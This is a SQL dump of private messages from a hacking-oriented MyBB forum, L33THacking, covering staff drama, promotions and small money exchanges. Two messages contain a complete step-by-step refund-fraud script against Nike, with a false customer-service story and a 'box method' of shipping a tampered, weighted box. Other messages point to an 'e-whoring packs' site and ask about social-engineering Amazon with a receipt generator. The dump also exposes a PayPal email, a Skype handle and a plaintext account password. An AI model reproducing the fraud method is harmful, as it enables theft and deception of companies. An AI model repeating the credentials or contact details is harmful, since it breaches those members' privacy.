jok3r\']\r\n[quote=\'sirchamp\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'sirchamp\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'sirchamp\']\r\n[quote=\'t3h jok3r\']\r\nI was wondering if you could help me make new threads. We have enough posts, we need more threads. The more threads we have the more members we would get. \r\n[/quote]\r\n\r\nYeah sure. I can make new threads and tutorials. But one thing I do not do is copy threads and tutorials which are made by other guys. \r\n[/quote]\r\nStop crying on about Triple H. \r\n[/quote]\r\nYour forum already has a bad reputation. You dont want more\r\n[/quote]\r\n\r\nSuch as? \r\n[/quote]\r\nActually Its the thing about triple h.\r\n[/quote]\r\nThe thing is that Triple H is a test account ran by an Admin on LH. Admins don\'t really have time to give out credits, because we do quick searches and then copy and paste the tutorials and we have a lot of work to do on ACP.\r\n\r\nI have issued the warning, I also contacted the Admin and told them about the credits thing and they said they will pay more attention to it because why don\'t want LH to be called a skiddies leeching forum. \r\n\r\n\r\n[/quote]\r\n\r\nAhh okay.', '1346324692', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1017', '67', '67', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'L33thacking.com', '0', 'Dude do you sense something fucked up in this forum? I keep getting errors upon posting and shit.. -.-\r\nSorry for swearing.. I\'m in a bad mood.', '1346350312', '0', '3', '1346352344', '1', '0', '2', '1346352230'); INSERT INTO mybb_privatemessages VALUES('1020', '67', '82', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: L33thacking.com', '0', '[quote=\'iTzIpod\']\r\nDude do you sense something fucked up in this forum? I keep getting errors upon posting and shit.. -.-\r\nSorry for swearing.. I\'m in a bad mood.\r\n[/quote]\r\n\r\nNo errors here o.o Ill try to reply to my own thread and remove it to see if i get a error.', '1346352277', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1022', '67', '82', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: L33thacking.com', '0', '[quote=\'iTzIpod\']\r\nDude do you sense something fucked up in this forum? I keep getting errors upon posting and shit.. -.-\r\nSorry for swearing.. I\'m in a bad mood.\r\n[/quote]\r\n\r\nDafuq. You see the \"test .\" Thats my reply:\r\nhttp://gyazo.com/0e9e335a19a5debce6ceb489ee7f01d1', '1346352344', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1060', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: And', '0', 'Aight so should we say you gave my account to someone else? \r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\nAlrighty :3 so do you think I should make a new account or change this one saying you gave my account away. But it is really me? And just so you know I am getting VIP and super VIP on sites to leak here :)\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\nYou want to know why I jaw not been doing alot? MY FUCKING CLOSEST RELATIVE DIED. So ok if you do not care about our friendship I care most about my family. And my relative was one of the most important people in the world to me.\r\n[/quote]\r\n\r\nI understand what happened to your relative but what does that have to do with your abuse of powers? I can understand attitude because when people are upset they want to fuck around people and when you were messing with iTzIpod, I said nothing. I really considered you my best online friend online who I could trust, I knew reborn more longer than you but trusted you the most. First you said you are cool with iTzIpod then you go on removing his awards. \r\n\r\nWhy?\r\n[/quote]\r\nI removed the graphics award because it is supposed to signify that you are good not because you have shared tutorials that are not made by you. It was not a hate action it was a realistic action because he is not amazing enough to get it. I was not hating. And yes I sorta went out of cotrol and lashed out my rage at the site and I am sorry for that. I would still like to be friends and if you want eventually partners in this again. I was teary eyed when I saw the post. You ARE my best online friend. \r\n[/quote]\r\n\r\nSure, I would still like to be your friend. \r\n[/quote]\r\nSo no to everything else?\r\n[/quote]\r\n\r\nNo to? \r\n[/quote]\r\nEventually becoming partners on here again. And do you understand the graphics award thing?\r\n[/quote]\r\n\r\nSure, I can\'t add you as a Admin at the moment because I\'m receiving some SQL Errors so can\'t really use the ACP. \r\n[/quote]\r\nThanks :) II was thinking because iPod hates my guts should I make a new account? Like I would keep apathy but make a new one so that iPod will not know I is me and therefor not hate me. :3 also back in the USA yet?\r\n[/quote]\r\n\r\nI told you when I\'m leaving. \r\n[/quote]\r\n[/quote]\r\n\r\nThat\'s cool. That would be a bad idea, because if you are new and I make you an admin then people will question me how did I make a completely new member an Admin. \r\n[/quote]', '1346369559', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1087', '154', '1', '154', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: E-whoring packs site', '0', '[quote=\'t3h jok3r\']\r\nhttp://darkjb.com/\r\n\r\nAlso welcome to L33THacking. \r\n[/quote]thanks brooo\r\nand cheers :D', '1346371712', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1096', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: And', '0', 'Then what should we do? iPod refuses to even give me a chance. Who is lobocca and sure I was waiting till everything got sorted to release all the stuff though. \r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\nAight so should we say you gave my account to someone else? \r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\nAlrighty :3 so do you think I should make a new account or change this one saying you gave my account away. But it is really me? And just so you know I am getting VIP and super VIP on sites to leak here :)\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\nYou want to know why I jaw not been doing alot? MY FUCKING CLOSEST RELATIVE DIED. So ok if you do not care about our friendship I care most about my family. And my relative was one of the most important people in the world to me.\r\n[/quote]\r\n\r\nI understand what happened to your relative but what does that have to do with your abuse of powers? I can understand attitude because when people are upset they want to fuck around people and when you were messing with iTzIpod, I said nothing. I really considered you my best online friend online who I could trust, I knew reborn more longer than you but trusted you the most. First you said you are cool with iTzIpod then you go on removing his awards. \r\n\r\nWhy?\r\n[/quote]\r\nI removed the graphics award because it is supposed to signify that you are good not because you have shared tutorials that are not made by you. It was not a hate action it was a realistic action because he is not amazing enough to get it. I was not hating. And yes I sorta went out of cotrol and lashed out my rage at the site and I am sorry for that. I would still like to be friends and if you want eventually partners in this again. I was teary eyed when I saw the post. You ARE my best online friend. \r\n[/quote]\r\n\r\nSure, I would still like to be your friend. \r\n[/quote]\r\nSo no to everything else?\r\n[/quote]\r\n\r\nNo to? \r\n[/quote]\r\nEventually becoming partners on here again. And do you understand the graphics award thing?\r\n[/quote]\r\n\r\nSure, I can\'t add you as a Admin at the moment because I\'m receiving some SQL Errors so can\'t really use the ACP. \r\n[/quote]\r\nThanks :) II was thinking because iPod hates my guts should I make a new account? Like I would keep apathy but make a new one so that iPod will not know I is me and therefor not hate me. :3 also back in the USA yet?\r\n[/quote]\r\n\r\nI told you when I\'m leaving. \r\n[/quote]\r\n[/quote]\r\n\r\nThat\'s cool. That would be a bad idea, because if you are new and I make you an admin then people will question me how did I make a completely new member an Admin. \r\n[/quote]\r\n[/quote]\r\n\r\nUmm, sorry no because then people will think that LH doesn\'t respect members privacy.\r\n\r\nAlso, Labrocca is working out the plugins problem that are causing the SQL Errors. Also can you be active please? \r\n[/quote]', '1346382125', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1098', '61', '82', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'thanks', '0', 'Here\'s my paypal\r\nfobonary@hotmail.com\r\n\r\nor do i need to make a new one?', '1346384631', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1102', '61', '82', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: thanks', '0', '[quote=\'iTzIpod\']\r\n[quote=\'NXK\']\r\nHere\'s my paypal\r\nfobonary@hotmail.com\r\n\r\nor do i need to make a new one?\r\n[/quote]\r\nIt doesn\'t matter. But right now I\'m on mobilenso I don\'t know if my Paypal will work. If it does, you\'re welcome. If it doesn\'t, I\'m sorry and I will send it tomorrow morning (EST)\r\n[/quote]\r\n\r\nAlright, Ill make sure I get the money back to you soon. \r\n\r\nthat 50 cent debt.', '1346385082', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1110', '61', '82', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Paypal', '0', '[quote=\'iTzIpod\']\r\nHey NXK, I have sent you .50 cents. I sent the payment to fobonary@hotmail.com Can you please confirm it? (: No probem once again.\r\n[/quote]\r\n\r\nI got it. Thank you once again!\r\n\r\n', '1346388896', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1112', '112', '1', '112', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: You have been granted an award.', '0', '[quote=\'t3h jok3r\']\r\nYou have been granted the [b]Elite[/b] award to signify your upgrade.\r\n[/quote]\r\n\r\nawesome. thanks', '1346392527', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1115', '150', '1', '150', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Welcome to L33T Hacking!', '0', '[quote=\'t3h jok3r\']\r\nWelcome to our forum MinecraftGeek.\r\n\r\nI am the founder of the L33THacking, if you have any problems or have any questions then feel free to contact any Staff member from our [url=http://l33thacking.com/showteam.php]Staff list[/url].\r\n\r\nFeel free to view our [url=http://l33thacking.com/misc.php?action=help]Help Documents[/url] because answers to most of your questions can be found in the Help Documents.\r\n\r\nHope you enjoy our forums.\r\n\r\nL33T Hacking\r\nhttp://l33thacking.com\r\n[/quote]\r\nThanks for the welcome I\'m MinecraftGeek from NC.', '1346417478', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1146', '2', '54', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"54\";}}', '2', 'Fw: hey', '0', '[quote=\'Mr.Omni\']\r\ni just left to post HQ threads here... :(\r\n\r\n[/quote]\r\n\r\nWhat do you mean? What are you talking about ?', '1346473534', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1150', '2', '54', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"54\";}}', '2', 'Re: hey', '0', '[quote=\'Mr.Omni\']\r\n[quote=\'Apathy\']\r\n[quote=\'Mr.Omni\']\r\ni just left to post HQ threads here... :(\r\n\r\n[/quote]\r\n\r\nWhat do you mean? What are you talking about ?\r\n[/quote]\r\ni will ot post HQ threads here..... due to my own forum... i have to give time yo my forum ;)\r\n[/quote]\r\nSo you are leaving to your forums? Is that what you are trying to say?', '1346473754', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1154', '2', '54', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"54\";}}', '2', 'Re: hey', '0', '[quote=\'Mr.Omni\']\r\n[quote=\'Apathy\']\r\n[quote=\'Mr.Omni\']\r\n[quote=\'Apathy\']\r\n[quote=\'Mr.Omni\']\r\ni just left to post HQ threads here... :(\r\n\r\n[/quote]\r\n\r\nWhat do you mean? What are you talking about ?\r\n[/quote]\r\ni will ot post HQ threads here..... due to my own forum... i have to give time yo my forum ;)\r\n[/quote]\r\nSo you are leaving to your forums? Is that what you are trying to say?\r\n[/quote]\r\nlol.... i just left this forum for my forum....\r\ni m owner of my own forum??? wana see it?\r\n[/quote]\r\nSure? Are you leaving for good? Or will still be active here?', '1346474504', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1158', '160', '3', '160', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"3\";}}', '2', 'Hey', '0', 'Can I have your bot list?\r\n\r\nThanks :)', '1346506583', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1160', '159', '53', '159', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '2', 'ebook', '0', ' Here you go, this is legit, its easy, no effort what so ever once you read/ try it please PM me back thanks\r\n\r\n[Spoiler]\r\nhttp://www.mediafire.com/?0ibug92lul999b3\r\n[/spoiler]\r\n\r\nMake sure to say thanks, and vouch in the thread! ill give back thanks aswell! \r\n\r\nCoders wanted, working on a multi-proxy loader for this niche.\r\n[b][size=medium]\r\nPlease feel free to PM me with any questions or concerns [/size][/b]\r\n', '1346524962', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1163', '67', '67', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', ':O', '0', ':O', '1346606427', '0', '0', '0', '1', '0', '1', '0'); INSERT INTO mybb_privatemessages VALUES('1164', '67', '67', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '2', ':O', '0', ':O', '1346606427', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1166', '160', '61', '160', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '2', 'Skype or Aim?', '0', 'Can I talk to you on skype or aim for a sec?', '1346614845', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1170', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', ':3', '0', 'Make a leaking section. Someplace where I can put ebooks and stuff.', '1346642424', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1168', '61', '160', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"160\";}}', '2', 'Re: Skype or Aim?', '0', '[quote=\'Jacob\']\r\nCan I talk to you on skype or aim for a sec?\r\n[/quote]\r\n\r\nsure, xwoogiex is my skype.', '1346628923', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1206', '53', '82', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Thread Design', '0', 'Hello\r\nI wrote an e-book and i want to sell it. But to make it look professional i need a good thread design. I already have a template of one but I do not know how to edit the psd files. I do not have photoshop and i do not want to download it. So i need to know how to edit the psd files without photoshop. Im not such a graphic type.. I saw lots of your graphics and I was very impressed :D So you probobally know how to make/edit psd files. \r\nthanks and regards', '1346695820', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1210', '53', '82', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Thread Design', '0', '[quote=\'iTzIpod\']\r\n[quote=\'sirchamp\']\r\nHello\r\nI wrote an e-book and i want to sell it. But to make it look professional i need a good thread design. I already have a template of one but I do not know how to edit the psd files. I do not have photoshop and i do not want to download it. So i need to know how to edit the psd files without photoshop. Im not such a graphic type.. I saw lots of your graphics and I was very impressed :D So you probobally know how to make/edit psd files. \r\nthanks and regards\r\n[/quote]\r\n\r\nCan you upload the .PSD file to Mediafire or something and give the the link? I will replace the words with what you want.\r\n[/quote]\r\nI wont upload it quite yet because im not finished with the ebook yet. I will pm you again when I am ready this could take another week or something so dont wait..\r\nThanks a lot', '1346696823', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1239', '166', '1', '166', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Curious', '0', 'How does one SE on amazon using the receipt generator? ', '1346728078', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1245', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: :3', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\nMake a leaking section. Someplace where I can put ebooks and stuff.\r\n[/quote]\r\n\r\nCan\'t because then we will have more leeched content and less content in tutorials etc sections. \r\n\r\nWhy not put in under the hacking tab?\r\n\r\nAlso need to make your access account. \r\n[/quote]\r\n\r\nPoopipie\r\nsosecret32', '1346764057', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1250', '53', '84', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"84\";}}', '2', 'Hello', '0', 'I do not know how to exchange paypal money to Liberty reserve can you tell me how?\r\nThanks', '1346768591', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1253', '53', '1', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Exchange', '0', '[quote=\'t3h jok3r\']\r\nIt\'s allowed. \r\n[/quote]\r\nAh good xD', '1346772193', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1256', '150', '172', '150', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"172\";}}', '2', 'NC PTP', '0', 'Are you interested in the paid to post?', '1346774870', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1258', '172', '150', '172', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"150\";}}', '2', 'Re: NC PTP', '0', '[quote=\'MinecraftGeek\']\r\nAre you interested in the paid to post?\r\n[/quote]\r\n\r\nOn NerdChat? well im not so active poster any more :( How much is the payout maximum?', '1346775195', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1260', '150', '172', '150', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"172\";}}', '2', 'Re: NC PTP', '0', '[quote=\'MistaCode\']\r\n[quote=\'MinecraftGeek\']\r\nAre you interested in the paid to post?\r\n[/quote]\r\n\r\nOn NerdChat? well im not so active poster any more :( How much is the payout maximum?\r\n[/quote]\r\nI have $20 for it to go on for a few days also the minimum payout is only 0.50 cents :)', '1346775230', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1262', '172', '150', '172', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"150\";}}', '2', 'Re: NC PTP', '0', '[quote=\'MinecraftGeek\']\r\n[quote=\'MistaCode\']\r\n[quote=\'MinecraftGeek\']\r\nAre you interested in the paid to post?\r\n[/quote]\r\n\r\nOn NerdChat? well im not so active poster any more :( How much is the payout maximum?\r\n[/quote]\r\nI have $20 for it to go on for a few days also the minimum payout is only 0.50 cents :)\r\n[/quote]\r\n\r\nWell lets see if i can get ;D', '1346775358', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1264', '172', '150', '172', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"150\";}}', '2', 'Re: NC PTP', '0', '[quote=\'MinecraftGeek\']\r\n[quote=\'MistaCode\']\r\n[quote=\'MinecraftGeek\']\r\nAre you interested in the paid to post?\r\n[/quote]\r\n\r\nOn NerdChat? well im not so active poster any more :( How much is the payout maximum?\r\n[/quote]\r\nI have $20 for it to go on for a few days also the minimum payout is only 0.50 cents :)\r\n[/quote]\r\n\r\nBut yeah can y change my Username to MistaCode on NerdChat? Thanks ;)', '1346775509', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1266', '84', '53', '84', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '2', 'Re: Hello', '0', '[quote=\'sirchamp\']\r\nI do not know how to exchange paypal money to Liberty reserve can you tell me how?\r\nThanks\r\n[/quote]\r\nU can create thread on hf and exchange it', '1346776929', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1288', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Notepad', '0', '[quote=\'t3h jok3r\']\r\nI updated your notepad with a Account Retrieval Guide. I also posted it on the ACP notepad. It has instructions on what to ask a member in order to hand over the account to them. \r\n[/quote]\r\n\r\nNotepad? What?', '1346797858', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1291', '20', '1', '20', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Sup', '0', '[quote=\'t3h jok3r\']\r\nYo, I was thinking if you are coming online can you please make at least 1 post then go offline because LH is dependent on content at the moment. \r\n[/quote]\r\n\r\nI am actually thinking of stepping down from Site Mod, I am very busy with school.', '1346798449', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1294', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Notepad', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\nI updated your notepad with a Account Retrieval Guide. I also posted it on the ACP notepad. It has instructions on what to ask a member in order to hand over the account to them. \r\n[/quote]\r\n\r\nNotepad? What?\r\n[/quote]\r\n\r\nUsercp>Scroll right down.\r\n\r\nI wrote a method for you on how to retrieve accounts. Remember you are in-charge of stolen/hacked accounts?\r\n[/quote]\r\nAnd rep abuse and awards(if we get them back.', '1346815243', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1296', '112', '82', '112', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'hello', '0', 'hey man, got any time free this week to teach me to SE. i added you on Skype btw. thanks', '1346815805', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1299', '20', '1', '20', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Sup', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'JakeUS\']\r\n[quote=\'t3h jok3r\']\r\nYo, I was thinking if you are coming online can you please make at least 1 post then go offline because LH is dependent on content at the moment. \r\n[/quote]\r\n\r\nI am actually thinking of stepping down from Site Mod, I am very busy with school.\r\n[/quote]\r\n\r\nAre you sure?\r\n[/quote]\r\n\r\nYeah sorry, I need to focus on school this year, I will be on everyday though.\r\n\r\n:)', '1346843873', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1301', '53', '84', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"84\";}}', '2', 'Exchange', '0', 'Hey Again\r\nI want to ask if you would like to make an exchange with me. You give me 50 cents on LR and i will give you up to 1 dollar on paypal. Write back if youre interested :D\r\nRegards', '1346859917', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1306', '112', '1', '112', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Nike', '0', 'Nike Method, Please leave positive rep if this helped you. also let me know how you get on with this.\r\n\r\n How to Get a Free Pair of Nikes\r\n\r\n\r\n\r\n Step 1\r\n===================================================================================\r\n\r\nOkay, 1st of all you need to ring this number: 1300 65 64 53.\r\nOnce you have gotten hold of someone, say the story below.\r\n\r\n\r\n\"Hi, my name is Michael, I recently purchased two pairs of [the nike shoes you want] for my children for passing there HSC exams. A pair of [any pair of nike shoes] for my son, and a pair [the nike shoes you want.] for my Daughter. My daughter is in a before school study session, so we had to rush her up to the school once she had gotten her present, so she didn\'t have a chance to open up the shoes.. My son is crazy about his, and has been showing them off to his mates all evening. Thankfully he is out there instead of in here. [A laugh here for good measure :) ]\r\nBut my problem is that about 30 minutes ago my daughter gave me a call, and she is upset because 1 of the shoes are missing from the box. She is fairly fond of shoes so i know she wouldn\'t be joking. I told her to google your number so that I could ring you. So... i was wondering if I could get some help.\"\r\n\r\n\r\n Step 2\r\n===================================================================================\r\n\r\nNow they will ask for your email. After a couple of days they will send you out a box to put the shoes in for them to inspect them. This next trick is called the box method. The box method is getting a company to think that your item was stolen.\r\nTo do the box method, (In this case you received a shipping label in your email) get a box.\r\nTape the box shut, and put the shipping label a bit out of the way of the opening of the box. It needs to remain legible. Break into the box as if you are trying to steal whatever is inside. Now grab a weight of some sort, this can be a phonebook, rocks, etc. and stick them in the box. Now messily tape the box shut. Ship it out.\r\nWait 3 days, since the shipping is a two day label. If you haven\'t received a call from Nike yet, call them and ask if you can check on the replacement. They will do a little investigation and say that the box was empty. At this point, they will either issue you a replacement, or they won’t. If they don\'t...\r\nFLIP THE FUCK OUT.', '1346863849', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1308', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Staff', '0', 'I would love too. My school isn\'t that bad anymore either.\r\n\r\nSo ill be more active for sure.', '1346871566', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1310', '20', '1', '20', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Sup', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'JakeUS\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'JakeUS\']\r\n[quote=\'t3h jok3r\']\r\nYo, I was thinking if you are coming online can you please make at least 1 post then go offline because LH is dependent on content at the moment. \r\n[/quote]\r\n\r\nI am actually thinking of stepping down from Site Mod, I am very busy with school.\r\n[/quote]\r\n\r\nAre you sure?\r\n[/quote]\r\n\r\nYeah sorry, I need to focus on school this year, I will be on everyday though.\r\n\r\n:)\r\n[/quote]\r\nNo problem, would you like to be a Mod or elite? \r\n[/quote]\r\n\r\nDoesn\'t matter, I will be on about every day also.', '1346874103', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1317', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Staff', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'NXK\']\r\nI would love too. My school isn\'t that bad anymore either.\r\n\r\nSo ill be more active for sure.\r\n[/quote]\r\n\r\nCool just give me one day to promote you and ask what JakeUS what\'s to become. He decided to step down because of his school. \r\n[/quote]\r\n\r\nAlright aha, Thanks for this.', '1346880677', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1336', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Staff', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\nI\'m promoted NXK to staff. Couldn\'t talk this out, reasons as follow.\r\n\r\nJakeUS said that he can\'t be staff anymore because of schools but he will be active but not active enough to handle reports in future. iTzIpod is 15- plus as he said that he will be busy with school and he lives outside of US so NXK was the only one left to promote and he even agreed. I can\'t make you a Staff lol. \r\n[/quote]\r\nStaff is better then admin?\r\n[/quote]\r\n\r\nNo, why do you think that? \r\n[/quote]\r\nI was asking. :3 sorry and is iPod still going to be semi active?', '1346902611', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1339', '84', '53', '84', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '2', 'Re: Exchange', '0', '[quote=\'sirchamp\']\r\nHey Again\r\nI want to ask if you would like to make an exchange with me. You give me 50 cents on LR and i will give you up to 1 dollar on paypal. Write back if youre interested :D\r\nRegards\r\n[/quote]\r\nI dont have paypal', '1346950567', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1341', '53', '84', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"84\";}}', '2', 'Re: Exchange', '0', '[quote=\'Thunder™\']\r\n[quote=\'sirchamp\']\r\nHey Again\r\nI want to ask if you would like to make an exchange with me. You give me 50 cents on LR and i will give you up to 1 dollar on paypal. Write back if youre interested :D\r\nRegards\r\n[/quote]\r\nI dont have paypal\r\n[/quote]\r\nOkay :( \r\nIm just filling out surveys on a website and then i get paid out on LR ;D', '1346956666', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1345', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Group', '0', 'Id like to make a gamers group. Since there\'s no section for it. I thought Id make a private group for it. That way people wont really see it. And we can have our own private forum. I think it would look better and keep posts more HQ.\r\n\r\nheres some userbars I made/came up with in class today >:) ahahahha\r\n\r\nhttp://imgur.com/a/dd02l', '1346962232', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1349', '112', '82', '112', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Nike', '0', 'Nike Method, Please leave positive rep if this helped you. also let me know how you get on with this.\r\n\r\n How to Get a Free Pair of Nikes\r\n\r\n\r\n\r\n Step 1\r\n ================================================================================?===\r\n\r\n Okay, 1st of all you need to ring this number: 1300 65 64 53.\r\n Once you have gotten hold of someone, say the story below.\r\n\r\n\r\n \"Hi, my name is Michael, I recently purchased two pairs of [the nike shoes you want] for my children for passing there HSC exams. A pair of [any pair of nike shoes] for my son, and a pair [the nike shoes you want.] for my Daughter. My daughter is in a before school study session, so we had to rush her up to the school once she had gotten her present, so she didn\'t have a chance to open up the shoes.. My son is crazy about his, and has been showing them off to his mates all evening. Thankfully he is out there instead of in here. [A laugh here for good measure ]\r\n But my problem is that about 30 minutes ago my daughter gave me a call, and she is 